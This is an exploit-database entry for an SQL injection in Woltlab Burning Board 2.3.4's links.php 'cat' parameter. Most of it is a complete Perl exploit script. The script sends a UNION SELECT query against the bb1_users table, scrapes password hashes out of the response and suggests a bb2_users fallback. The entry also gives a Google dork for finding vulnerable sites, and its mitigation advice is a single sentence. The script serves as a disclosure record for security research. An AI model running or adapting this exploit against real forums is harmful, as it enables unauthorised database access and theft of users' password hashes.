Woltlab Burning Board 2.3.4

vendor:

Burning Board

by:

666 (SR-Crew)

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Burning Board

Affected Version From: 2.3.4

Affected Version To: 2.3.4

Patch Exists: YES

Related CWE: N/A

CPE: a:woltlab:burning_board:2.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2006

Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL queries into the vulnerable Woltlab Burning Board 2.3.4 web application. The vulnerable parameter is the "cat" parameter in the "links.php" file. By exploiting this vulnerability, an attacker can gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                            ##
##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Exploit by       |  666 (SR-Crew)                                         ##
##  Bug by           |  x82                                                   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
##  Usage            |  links.pl [server] [path]                              ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "[+] Exploiting....\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
	if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {
		break;
	}
}

$wbb_dir = 
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
PeerPort=>"80") || die "[+] Can't connect to Server\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
	if ($answer =~ 
/(................................)<\/span><\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {
		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";

# milw0rm.com [2006-05-20]